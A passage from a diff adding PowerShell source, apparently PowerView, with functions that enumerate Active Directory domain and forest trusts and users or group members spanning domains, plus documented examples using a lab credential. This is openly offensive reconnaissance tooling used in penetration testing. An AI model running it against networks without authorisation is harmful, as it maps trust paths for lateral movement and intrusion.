number of methods. By default, and LDAP search using the filter +'(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified +LDAP is used as well. If the -NET flag is specified, the .NET method +GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain +object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is +used to enumerate instead. + +.PARAMETER Domain + +Specifies the domain to query for trusts, defaults to the current domain. + +.PARAMETER API + +Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in +.NET methods. + +.PARAMETER NET + +Switch. Use .NET queries to enumerate trusts instead of the default LDAP method. 
+ +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainTrust + +Return domain trusts for the current domain using built in .LDAP methods. + +.EXAMPLE + +Get-DomainTrust -NET -Domain "prod.testlab.local" + +Return domain trusts for the "prod.testlab.local" domain using .NET methods + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainTrust -Domain "prod.testlab.local" -Server "PRIMARY.testlab.local" -Credential $Cred + +Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP +queries, binding to the PRIMARY.testlab.local server for queries, and using the specified +alternate credenitals. + +.EXAMPLE + +Get-DomainTrust -API -Domain "prod.testlab.local" + +Return domain trusts for the "prod.testlab.local" domain enumerated through API calls. 
+ +.OUTPUTS + +PowerView.DomainTrust.LDAP + +Custom PSObject with translated domain LDAP trust result fields (default). + +PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods. + +PowerView.DomainTrust.API + +Custom PSObject with translated domain API trust result fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DomainTrust.NET')] + [OutputType('PowerView.DomainTrust.LDAP')] + [OutputType('PowerView.DomainTrust.API')] + [CmdletBinding(DefaultParameterSetName = 'LDAP')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Parameter(ParameterSetName = 'API')] + [Switch] + $API, + + [Parameter(ParameterSetName = 'NET')] + [Switch] + $NET, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [Parameter(ParameterSetName = 'LDAP')] + [Parameter(ParameterSetName = 'API')] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Parameter(ParameterSetName = 'LDAP')] + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Parameter(ParameterSetName = 'LDAP')] + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = 
[Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $TrustAttributes = @{ + [uint32]'0x00000001' = 'NON_TRANSITIVE' + [uint32]'0x00000002' = 'UPLEVEL_ONLY' + [uint32]'0x00000004' = 'FILTER_SIDS' + [uint32]'0x00000008' = 'FOREST_TRANSITIVE' + [uint32]'0x00000010' = 'CROSS_ORGANIZATION' + [uint32]'0x00000020' = 'WITHIN_FOREST' + [uint32]'0x00000040' = 'TREAT_AS_EXTERNAL' + [uint32]'0x00000080' = 'TRUST_USES_RC4_ENCRYPTION' + [uint32]'0x00000100' = 'TRUST_USES_AES_KEYS' + [uint32]'0x00000200' = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION' + [uint32]'0x00000400' = 'PIM_TRUST' + } + + $LdapSearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $LdapSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $LdapSearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['Properties']) { $LdapSearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $LdapSearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $LdapSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $LdapSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $LdapSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $LdapSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $LdapSearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PsCmdlet.ParameterSetName -ne 'API') { + $NetSearcherArguments = @{} + if ($Domain -and $Domain.Trim() -ne '') { + $SourceDomain = $Domain + } + else { + if ($PSBoundParameters['Credential']) { + $SourceDomain = (Get-Domain -Credential $Credential).Name + } + else { + $SourceDomain = (Get-Domain).Name + } + } + } + elseif ($PsCmdlet.ParameterSetName -ne 'NET') { + if ($Domain -and $Domain.Trim() 
-ne '') { + $SourceDomain = $Domain + } + else { + $SourceDomain = $Env:USERDNSDOMAIN + } + } + + if ($PsCmdlet.ParameterSetName -eq 'LDAP') { + # if we're searching for domain trusts through LDAP/ADSI + $TrustSearcher = Get-DomainSearcher @LdapSearcherArguments + $SourceSID = Get-DomainSID @NetSearcherArguments + + if ($TrustSearcher) { + + $TrustSearcher.Filter = '(objectClass=trustedDomain)' + + if ($PSBoundParameters['FindOne']) { $Results = $TrustSearcher.FindOne() } + else { $Results = $TrustSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Props = $_.Properties + $DomainTrust = New-Object PSObject + + $TrustAttrib = @() + $TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] } + + $Direction = Switch ($Props.trustdirection) { + 0 { 'Disabled' } + 1 { 'Inbound' } + 2 { 'Outbound' } + 3 { 'Bidirectional' } + } + + $TrustType = Switch ($Props.trusttype) { + 1 { 'WINDOWS_NON_ACTIVE_DIRECTORY' } + 2 { 'WINDOWS_ACTIVE_DIRECTORY' } + 3 { 'MIT' } + } + + $Distinguishedname = $Props.distinguishedname[0] + $SourceNameIndex = $Distinguishedname.IndexOf('DC=') + if ($SourceNameIndex) { + $SourceDomain = $($Distinguishedname.SubString($SourceNameIndex)) -replace 'DC=','' -replace ',','.' 
+ } + else { + $SourceDomain = "" + } + + $TargetNameIndex = $Distinguishedname.IndexOf(',CN=System') + if ($SourceNameIndex) { + $TargetDomain = $Distinguishedname.SubString(3, $TargetNameIndex-3) + } + else { + $TargetDomain = "" + } + + $ObjectGuid = New-Object Guid @(,$Props.objectguid[0]) + $TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value + + $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain + $DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0] + # $DomainTrust | Add-Member Noteproperty 'TargetGuid' "{$ObjectGuid}" + $DomainTrust | Add-Member Noteproperty 'TrustType' $TrustType + $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $($TrustAttrib -join ',') + $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$Direction" + $DomainTrust | Add-Member Noteproperty 'WhenCreated' $Props.whencreated[0] + $DomainTrust | Add-Member Noteproperty 'WhenChanged' $Props.whenchanged[0] + $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.LDAP') + $DomainTrust + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainTrust] Error disposing of the Results object: $_" + } + } + $TrustSearcher.dispose() + } + } + elseif ($PsCmdlet.ParameterSetName -eq 'API') { + # if we're searching for domain trusts through Win32 API functions + if ($PSBoundParameters['Server']) { + $TargetDC = $Server + } + elseif ($Domain -and $Domain.Trim() -ne '') { + $TargetDC = $Domain + } + else { + # see https://msdn.microsoft.com/en-us/library/ms675976(v=vs.85).aspx for default NULL behavior + $TargetDC = $Null + } + + # arguments for DsEnumerateDomainTrusts + $PtrInfo = [IntPtr]::Zero + + # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND + $Flags = 63 + $DomainCount = 0 + + # get the trust information from the target server + $Result = 
$Netapi32::DsEnumerateDomainTrusts($TargetDC, $Flags, [ref]$PtrInfo, [ref]$DomainCount) + + # Locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # Work out how much to increment the pointer by finding out the size of the structure + $Increment = $DS_DOMAIN_TRUSTS::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $DomainCount); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS + + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + + $SidString = '' + $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result -eq 0) { + Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + else { + $DomainTrust = New-Object PSObject + $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain + $DomainTrust | Add-Member Noteproperty 'TargetName' $Info.DnsDomainName + $DomainTrust | Add-Member Noteproperty 'TargetNetbiosName' $Info.NetbiosDomainName + $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags + $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex + $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType + $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes + $DomainTrust | Add-Member Noteproperty 'TargetSid' $SidString + $DomainTrust | Add-Member Noteproperty 'TargetGuid' $Info.DomainGuid + $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.API') + $DomainTrust + } + } + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + else { + # if 
we're searching for domain trusts through .NET methods + $FoundDomain = Get-Domain @NetSearcherArguments + if ($FoundDomain) { + $FoundDomain.GetAllTrustRelationships() | ForEach-Object { + $_.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.NET') + $_ + } + } + } + } +} + + +function Get-ForestTrust { +<# +.SYNOPSIS + +Return all forest trusts for the current forest or a specified forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +This function will enumerate domain trust relationships for the current (or a remote) +forest using number of method using the .NET method GetAllTrustRelationships() on a +System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest. + +.PARAMETER Forest + +Specifies the forest to query for trusts, defaults to the current forest. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-ForestTrust + +Return current forest trusts. + +.EXAMPLE + +Get-ForestTrust -Forest "external.local" + +Return trusts for the "external.local" forest. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestTrust -Forest "external.local" -Credential $Cred + +Return trusts for the "external.local" forest using the specified alternate credenitals. + +.OUTPUTS + +PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods (default). 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForestTrust.NET')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $NetForestArguments = @{} + if ($PSBoundParameters['Forest']) { $NetForestArguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $NetForestArguments['Credential'] = $Credential } + + $FoundForest = Get-Forest @NetForestArguments + + if ($FoundForest) { + $FoundForest.GetAllTrustRelationships() | ForEach-Object { + $_.PSObject.TypeNames.Insert(0, 'PowerView.ForestTrust.NET') + $_ + } + } + } +} + + +function Get-DomainForeignUser { +<# +.SYNOPSIS + +Enumerates users who are in groups outside of the user's domain. +This is a domain's "outgoing" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser + +.DESCRIPTION + +Uses Get-DomainUser to enumerate all users for the current (or target) domain, +then calculates the given user's domain name based on the user's distinguishedName. +This domain name is compared to the queried domain, and the user object is +output if they differ. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. 
+ +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainForeignUser + +Return all users in the current domain who are in groups not in the +current domain. + +.EXAMPLE + +Get-DomainForeignUser -Domain dev.testlab.local + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and +using the specified alternate credentials. + +.OUTPUTS + +PowerView.ForeignUser + +Custom PSObject with translated user property fields. 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForeignUser')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + $SearcherArguments['LDAPFilter'] = '(memberof=*)' + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] 
= $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw } + } + + PROCESS { + Get-DomainUser @SearcherArguments | ForEach-Object { + ForEach ($Membership in $_.memberof) { + $Index = $Membership.IndexOf('DC=') + if ($Index) { + + $GroupDomain = $($Membership.SubString($Index)) -replace 'DC=','' -replace ',','.' + $UserDistinguishedName = $_.distinguishedname + $UserIndex = $UserDistinguishedName.IndexOf('DC=') + $UserDomain = $($_.distinguishedname.SubString($UserIndex)) -replace 'DC=','' -replace ',','.' + + if ($GroupDomain -ne $UserDomain) { + # if the group domain doesn't match the user domain, display it + $GroupName = $Membership.Split(',')[0].split('=')[1] + $ForeignUser = New-Object PSObject + $ForeignUser | Add-Member Noteproperty 'UserDomain' $UserDomain + $ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname + $ForeignUser | Add-Member Noteproperty 'UserDistinguishedName' $_.distinguishedname + $ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain + $ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName + $ForeignUser | Add-Member Noteproperty 'GroupDistinguishedName' $Membership + $ForeignUser.PSObject.TypeNames.Insert(0, 'PowerView.ForeignUser') + $ForeignUser + } + } + } + } + } +} + + +function Get-DomainForeignGroupMember { +<# +.SYNOPSIS + +Enumerates groups with users outside of the group's domain and returns +each foreign member. This is a domain's "incoming" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainGroup + +.DESCRIPTION + +Uses Get-DomainGroup to enumerate all groups for the current (or target) domain, +then enumerates the members of each group, and compares the member's domain +name to the parent group's domain name, outputting the member if the domains differ. 
+ +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainForeignGroupMember + +Return all group members in the current domain where the group and member differ. + +.EXAMPLE + +Get-DomainForeignGroupMember -Domain dev.testlab.local + +Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all group members in the dev.testlab.local domain where the member is +not in dev.testlab.local. 
binding to the secondary.dev.testlab.local for +queries, and using the specified alternate credentials. + +.OUTPUTS + +PowerView.ForeignGroupMember + +Custom PSObject with translated group member property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForeignGroupMember')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + $SearcherArguments['LDAPFilter'] = '(member=*)' + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { 
$SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw } + } + + PROCESS { + # standard group names to ignore + $ExcludeGroups = @('Users', 'Domain Users', 'Guests') + + Get-DomainGroup @SearcherArguments | Where-Object { $ExcludeGroups -notcontains $_.samaccountname } | ForEach-Object { + $GroupName = $_.samAccountName + $GroupDistinguishedName = $_.distinguishedname + $GroupDomain = $GroupDistinguishedName.SubString($GroupDistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + + $_.member | ForEach-Object { + # filter for foreign SIDs in the cn field for users in another domain, + # or if the DN doesn't end with the proper DN for the queried domain + $MemberDomain = $_.SubString($_.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 
+ if (($_ -match 'CN=S-1-5-21.*-.*') -or ($GroupDomain -ne $MemberDomain)) { + $MemberDistinguishedName = $_ + $MemberName = $_.Split(',')[0].split('=')[1] + + $ForeignGroupMember = New-Object PSObject + $ForeignGroupMember | Add-Member Noteproperty 'GroupDomain' $GroupDomain + $ForeignGroupMember | Add-Member Noteproperty 'GroupName' $GroupName + $ForeignGroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupDistinguishedName + $ForeignGroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain + $ForeignGroupMember | Add-Member Noteproperty 'MemberName' $MemberName + $ForeignGroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDistinguishedName + $ForeignGroupMember.PSObject.TypeNames.Insert(0, 'PowerView.ForeignGroupMember') + $ForeignGroupMember + } + } + } + } +} + + +function Get-DomainTrustMapping { +<# +.SYNOPSIS + +This function enumerates all trusts for the current domain and then enumerates +all trusts for each domain it finds. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainTrust, Get-ForestTrust + +.DESCRIPTION + +This function will enumerate domain trust relationships for the current domain using +a number of methods, and then enumerates all trusts for each found domain, recursively +mapping all reachable trust relationships. By default, and LDAP search using the filter +'(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified +LDAP is used as well. If the -NET flag is specified, the .NET method +GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain +object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is +used to enumerate instead. If any + +.PARAMETER API + +Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the +built-in LDAP method. + +.PARAMETER NET + +Switch. 
Use .NET queries to enumerate trusts instead of the default LDAP method. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainTrustMapping | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using .NET methods and output everything to a .csv file. + +.EXAMPLE + +Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using Win32 API calls and output everything to a .csv file. + +.EXAMPLE + +Get-DomainTrustMapping -NET | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using .NET methods and output everything to a .csv file. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainTrustMapping -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries +using the specified alternate credentials, and output everything to a .csv file. + +.OUTPUTS + +PowerView.DomainTrust.LDAP + +Custom PSObject with translated domain LDAP trust result fields (default). + +PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods. + +PowerView.DomainTrust.API + +Custom PSObject with translated domain API trust result fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DomainTrust.NET')] + [OutputType('PowerView.DomainTrust.LDAP')] + [OutputType('PowerView.DomainTrust.API')] + [CmdletBinding(DefaultParameterSetName = 'LDAP')] + Param( + [Parameter(ParameterSetName = 'API')] + [Switch] + $API, + + [Parameter(ParameterSetName = 'NET')] + [Switch] + $NET, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [Parameter(ParameterSetName = 'LDAP')] + [Parameter(ParameterSetName = 'API')] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Parameter(ParameterSetName = 